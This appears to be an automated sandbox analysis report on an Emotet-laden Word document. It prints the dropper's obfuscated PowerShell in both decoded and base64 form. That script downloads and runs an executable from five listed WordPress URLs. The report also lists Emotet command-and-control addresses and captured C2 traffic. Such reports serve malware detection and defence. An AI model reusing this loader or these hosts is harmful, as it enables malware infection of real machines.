Analysis

  • max time kernel
    58s
  • max time network
    59s
  • platform
    windows7_x64
  • resource
    win7
  • submitted
    17-07-2020 20:24

General

  • Target

    a0d3eeaae4f459d8f244b90d97b4b8a40bca8daae995e676e4a4307e98a8e2bb.doc

  • Size

    190KB

  • MD5

    c3d62c1dccfaacec14d62bbe29629d0a

  • SHA1

    c13a5804da6c7bbd550d135da5026077a218ccb6

  • SHA256

    a0d3eeaae4f459d8f244b90d97b4b8a40bca8daae995e676e4a4307e98a8e2bb

  • SHA512

    e63e53199dabc0a7c6ce1fbc8838a2d72110498ea1c94bf78655d2bb02722627fe769389783f8066bafc775e82166d0662e73c18c1ae1d8097180affa0918086

Malware Config

Extracted

Language
ps1
Source
1
$thib='heej';[Net.ServicePointManager]::"SEc`Ur`ITY`prOtOcOl" = 'tls12, tls11, tls';$ceudjuj = '997';$quuuvjoelbeakzeopguvnoad='moequveothpaurjeec';$nib=$env:userprofile+'\'+$ceudjuj+'.exe';$rieyfoeyhoucfoem='yuawmeoldoizdaj';$choulloehcualneavwiozfeuk=.('n'+'ew-obj'+'ect') nEt.wEbclIENt;$choichyichpaucchoafvaiv='http://mican.tri-comma.com/wp-admin/BmKOeycm0704/*http://defensacovid.com/wp-admin/dGzIMVvo/*http://doorbhai.com/wp-admin/Wq6Kdoisk1r4060453/*http://agilentgame.reviewshell.com/cgi-bin/csoa45gw51315935/*http://karir-up.com/wp-admin/CCzj96yk23/'."S`plIT"([char]42);$maib='douychuasleov';foreach($raobzeux in $choichyichpaucchoafvaiv){try{$choulloehcualneavwiozfeuk."DOWn`lOA`Df`iLe"($raobzeux, $nib);$thoaktaehzertoxduaxweox='veaquthiacthiewthaukthoonhir';If ((.('Get'+'-Ite'+'m') $nib)."lE`NG`Th" -ge 30709) {([wmiclass]'win32_Process')."cRe`ATE"($nib);$yejkiomkauyzoh='tieb';break;$thoowrautdug='houtwiof'}}catch{}}$quoimcaonjoadyiavjoahzuul='yuunmof'
URLs
exe.dropper

http://mican.tri-comma.com/wp-admin/BmKOeycm0704/

exe.dropper

http://defensacovid.com/wp-admin/dGzIMVvo/

exe.dropper

http://doorbhai.com/wp-admin/Wq6Kdoisk1r4060453/

exe.dropper

http://agilentgame.reviewshell.com/cgi-bin/csoa45gw51315935/

exe.dropper

http://karir-up.com/wp-admin/CCzj96yk23/

Extracted

Family

emotet

C2

177.144.130.105:443

198.27.69.201:8080

157.7.164.178:8081

78.188.170.128:80

203.153.216.178:7080

77.74.78.80:443

178.33.167.120:8080

177.0.241.28:80

143.95.101.72:8080

51.38.201.19:7080

181.167.35.84:80

41.185.29.128:8080

192.163.221.191:8080

181.164.110.7:80

203.153.216.182:7080

80.211.32.88:8080

113.160.180.109:80

185.142.236.163:443

192.241.220.183:8080

87.106.231.60:8080

rsa_pubkey.plain
1
-----BEGIN PUBLIC KEY-----
2
MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ
3
cMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j
4
l32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB
5
-----END PUBLIC KEY-----
6

Signatures

  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Modifies registry class 280 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Emotet

    Emotet is a trojan that is primarily spread through spam emails.

  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs
  • Suspicious behavior: EmotetMutantsSpam 1 IoCs
  • Drops file in System32 directory 2 IoCs

Processes

  • C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\a0d3eeaae4f459d8f244b90d97b4b8a40bca8daae995e676e4a4307e98a8e2bb.doc"
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    PID:1496
  • C:\Windows\System32\WindowsPowerShell\v1.0\powersheLL.exe
    powersheLL -e JAB0AGgAaQBiAD0AJwBoAGUAZQBqACcAOwBbAE4AZQB0AC4AUwBlAHIAdgBpAGMAZQBQAG8AaQBuAHQATQBhAG4AYQBnAGUAcgBdADoAOgAiAFMARQBjAGAAVQByAGAASQBUAFkAYABwAHIATwB0AE8AYwBPAGwAIgAgAD0AIAAnAHQAbABzADEAMgAsACAAdABsAHMAMQAxACwAIAB0AGwAcwAnADsAJABjAGUAdQBkAGoAdQBqACAAPQAgACcAOQA5ADcAJwA7ACQAcQB1AHUAdQB2AGoAbwBlAGwAYgBlAGEAawB6AGUAbwBwAGcAdQB2AG4AbwBhAGQAPQAnAG0AbwBlAHEAdQB2AGUAbwB0AGgAcABhAHUAcgBqAGUAZQBjACcAOwAkAG4AaQBiAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjAGUAdQBkAGoAdQBqACsAJwAuAGUAeABlACcAOwAkAHIAaQBlAHkAZgBvAGUAeQBoAG8AdQBjAGYAbwBlAG0APQAnAHkAdQBhAHcAbQBlAG8AbABkAG8AaQB6AGQAYQBqACcAOwAkAGMAaABvAHUAbABsAG8AZQBoAGMAdQBhAGwAbgBlAGEAdgB3AGkAbwB6AGYAZQB1AGsAPQAuACgAJwBuACcAKwAnAGUAdwAtAG8AYgBqACcAKwAnAGUAYwB0ACcAKQAgAG4ARQB0AC4AdwBFAGIAYwBsAEkARQBOAHQAOwAkAGMAaABvAGkAYwBoAHkAaQBjAGgAcABhAHUAYwBjAGgAbwBhAGYAdgBhAGkAdgA9ACcAaAB0AHQAcAA6AC8ALwBtAGkAYwBhAG4ALgB0AHIAaQAtAGMAbwBtAG0AYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AQgBtAEsATwBlAHkAYwBtADAANwAwADQALwAqAGgAdAB0AHAAOgAvAC8AZABlAGYAZQBuAHMAYQBjAG8AdgBpAGQALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAGQARwB6AEkATQBWAHYAbwAvACoAaAB0AHQAcAA6AC8ALwBkAG8AbwByAGIAaABhAGkALgBjAG8AbQAvAHcAcAAtAGEAZABtAGkAbgAvAFcAcQA2AEsAZABvAGkAcwBrADEAcgA0ADAANgAwADQANQAzAC8AKgBoAHQAdABwADoALwAvAGEAZwBpAGwAZQBuAHQAZwBhAG0AZQAuAHIAZQB2AGkAZQB3AHMAaABlAGwAbAAuAGMAbwBtAC8AYwBnAGkALQBiAGkAbgAvAGMAcwBvAGEANAA1AGcAdwA1ADEAMwAxADUAOQAzADUALwAqAGgAdAB0AHAAOgAvAC8AawBhAHIAaQByAC0AdQBwAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBDAEMAegBqADkANgB5AGsAMgAzAC8AJwAuACIAUwBgAHAAbABJAFQAIgAoAFsAYwBoAGEAcgBdADQAMgApADsAJABtAGEAaQBiAD0AJwBkAG8AdQB5AGMAaAB1AGEAcwBsAGUAbwB2ACcAOwBmAG8AcgBlAGEAYwBoACgAJAByAGEAbwBiAHoAZQB1AHgAIABpAG4AIAAkAGMAaABvAGkAYwBoAHkAaQBjAGgAcABhAHUAYwBjAGgAbwBhAGYAdgBhAGkAdgApAHsAdAByAHkAewAkAGMAaABvAHUAbABsAG8AZQBoAGMAdQBhAGwAbgBlAGEAdgB3AGkAbwB6AGYAZQB1AGsALgAiAEQATwBXAG4AYABsAE8AQQBgAEQAZgBgAGkATABlACIAKAAkAHIAYQBvAGIAegBlAHUAeAAsACAAJABuAGkAYgApADsAJAB0AGgAbwBhAGsAdABhAGUAaAB6AGUAcgB0AG8AeABkAHUAYQB4AHcAZQBvAHgAPQAnAHYAZQBhAHEAdQB0AGgAaQBhAGMAdABoAGkAZQB3AHQAaABhAHUAawB0AGgAbwBvAG4AaABpAHIAJwA7AEkAZgAgACgAKAAuACgAJwBHAGUAdAAnACsAJwAtAEkAdABlACcAKwAnAG0AJwApACAAJABuAGkAYgApAC4AIgBsAEUAYABOAEcAYABUAGgAIgAgAC0AZwBlACAAMwAwADcAMAA5ACkAIAB7ACgAWwB3AG0AaQBjAGwAYQBzAHMAXQAnAHcAaQBuADMAMgBfAFAAcgBvAGMAZQBzAHMAJwApAC4AIgBjAFIAZQBgAEEAVABFACIAKAAkAG4AaQBiACkAOwAkAHkAZQBqAGsAaQBvAG0AawBhAHUAeQB6AG8AaAA9ACcAdABpAGUAYgAnADsAYgByAGUAYQBrADsAJAB0AGgAbwBvAHcAcgBhAHUAdABkAHUAZwA9ACcAaABvAHUAdAB3AGkAbwBmACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAHEAdQBvAGkAbQBjAGEAbwBuAGoAbwBhAGQAeQBpAGEAdgBqAG8AYQBoAHoAdQB1AGwAPQAnAHkAdQB1AG4AbQBvAGYAJwA=
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    • Blacklisted process makes network request
    • Process spawned unexpected child process
    • Suspicious behavior: EnumeratesProcesses
    • Drops file in System32 directory
    PID:1784
  • C:\Users\Admin\997.exe
    C:\Users\Admin\997.exe
    1⤵
    • Suspicious use of SetWindowsHookEx
    • Executes dropped EXE
    • Suspicious use of WriteProcessMemory
    • Drops file in System32 directory
    PID:1392
    • C:\Windows\SysWOW64\NaturalLanguage6\perfts.exe
      "C:\Windows\SysWOW64\NaturalLanguage6\perfts.exe"
      2⤵
      • Suspicious use of SetWindowsHookEx
      • Suspicious behavior: EnumeratesProcesses
      • Executes dropped EXE
      • Suspicious behavior: EmotetMutantsSpam
      PID:1932

Network

  • flag-unknown
    DNS
    mican.tri-comma.com
    Remote address:
    8.8.8.8:53
    Request
    mican.tri-comma.com
    IN A
    Response
    mican.tri-comma.com
    IN A
    34.209.178.218
  • flag-unknown
    GET
    http://mican.tri-comma.com/wp-admin/BmKOeycm0704/
    powersheLL.exe
    Remote address:
    34.209.178.218:80
    Request
    GET /wp-admin/BmKOeycm0704/ HTTP/1.1
    Host: mican.tri-comma.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: nginx/1.16.1
    Date: Fri, 17 Jul 2020 20:24:42 GMT
    Content-Type: application/x-dosexec
    Transfer-Encoding: chunked
    Connection: keep-alive
    X-Powered-By: PHP/7.2.29
    Set-Cookie: 5f12090a14356=1595017482; expires=Fri, 17-Jul-2020 20:25:42 GMT; Max-Age=60; path=/
    Cache-Control: no-cache, must-revalidate
    Pragma: no-cache
    Last-Modified: Fri, 17 Jul 2020 20:24:42 GMT
    Expires: Fri, 17 Jul 2020 20:24:42 GMT
    Content-Disposition: attachment; filename="n7p39jhzm41784.exe"
    Content-Transfer-Encoding: binary
  • flag-unknown
    POST
    http://177.144.130.105:443/b7yVZQXN8b/27oR5NkL8TOlcc23I4/478H/9OLQf7kfHknKcL8Pr9H/lqXz/
    perfts.exe
    Remote address:
    177.144.130.105:443
    Request
    POST /b7yVZQXN8b/27oR5NkL8TOlcc23I4/478H/9OLQf7kfHknKcL8Pr9H/lqXz/ HTTP/1.1
    Referer: http://177.144.130.105/b7yVZQXN8b/27oR5NkL8TOlcc23I4/478H/9OLQf7kfHknKcL8Pr9H/lqXz/
    Content-Type: multipart/form-data; boundary=---------------------------051498590750595
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: 177.144.130.105:443
    Content-Length: 4404
    Connection: Keep-Alive
    Cache-Control: no-cache
  • flag-unknown
    POST
    http://198.27.69.201:8080/jRbLWymhZSd9y/RIKld7S/1tDf2IlIGJ9rQtDD/NSH6CY32kQSrFk0Y1xu/ua9u/Sy3ibObCJVC3Kxy8z/
    perfts.exe
    Remote address:
    198.27.69.201:8080
    Request
    POST /jRbLWymhZSd9y/RIKld7S/1tDf2IlIGJ9rQtDD/NSH6CY32kQSrFk0Y1xu/ua9u/Sy3ibObCJVC3Kxy8z/ HTTP/1.1
    Referer: http://198.27.69.201/jRbLWymhZSd9y/RIKld7S/1tDf2IlIGJ9rQtDD/NSH6CY32kQSrFk0Y1xu/ua9u/Sy3ibObCJVC3Kxy8z/
    Content-Type: multipart/form-data; boundary=---------------------------306077884771751
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
    Host: 198.27.69.201:8080
    Content-Length: 4420
    Connection: Keep-Alive
    Cache-Control: no-cache
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Date: Fri, 17 Jul 2020 20:25:22 GMT
    Content-Type: text/html; charset=UTF-8
    Content-Length: 132
    Connection: keep-alive
  • 34.209.178.218:80
    http://mican.tri-comma.com/wp-admin/BmKOeycm0704/
    http
    powersheLL.exe
    4.8kB
    291.4kB
    103
    197

    HTTP Request

    GET http://mican.tri-comma.com/wp-admin/BmKOeycm0704/

    HTTP Response

    200
  • 177.144.130.105:443
    http://177.144.130.105:443/b7yVZQXN8b/27oR5NkL8TOlcc23I4/478H/9OLQf7kfHknKcL8Pr9H/lqXz/
    http
    perfts.exe
    5.4kB
    212 B
    9
    5

    HTTP Request

    POST http://177.144.130.105:443/b7yVZQXN8b/27oR5NkL8TOlcc23I4/478H/9OLQf7kfHknKcL8Pr9H/lqXz/
  • 198.27.69.201:8080
    http://198.27.69.201:8080/jRbLWymhZSd9y/RIKld7S/1tDf2IlIGJ9rQtDD/NSH6CY32kQSrFk0Y1xu/ua9u/Sy3ibObCJVC3Kxy8z/
    http
    perfts.exe
    5.4kB
    580 B
    9
    7

    HTTP Request

    POST http://198.27.69.201:8080/jRbLWymhZSd9y/RIKld7S/1tDf2IlIGJ9rQtDD/NSH6CY32kQSrFk0Y1xu/ua9u/Sy3ibObCJVC3Kxy8z/

    HTTP Response

    200
  • 10.7.0.255:138
    netbios-dgm
    1.1kB
    5
  • 224.0.0.252:5355
    100 B
    2
  • 10.7.0.255:137
    netbios-ns
    468 B
    6
  • 8.8.8.8:53
    mican.tri-comma.com
    dns
    65 B
    81 B
    1
    1

    DNS Request

    mican.tri-comma.com

    DNS Response

    34.209.178.218

  • 224.0.0.252:5355
    100 B
    2

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/1392-11-0x0000000000270000-0x000000000027C000-memory.dmp

    Filesize

    48KB

  • memory/1496-2-0x0000000008920000-0x0000000008924000-memory.dmp

    Filesize

    16KB

  • memory/1496-5-0x000000000AB90000-0x000000000AB94000-memory.dmp

    Filesize

    16KB

  • memory/1496-6-0x000000000BC10000-0x000000000BC14000-memory.dmp

    Filesize

    16KB

  • memory/1496-7-0x0000000006DA0000-0x0000000006FA0000-memory.dmp

    Filesize

    2.0MB

  • memory/1496-8-0x0000000002180000-0x0000000002181000-memory.dmp

    Filesize

    4KB

  • memory/1932-15-0x0000000000400000-0x0000000000448000-memory.dmp

    Filesize

    288KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.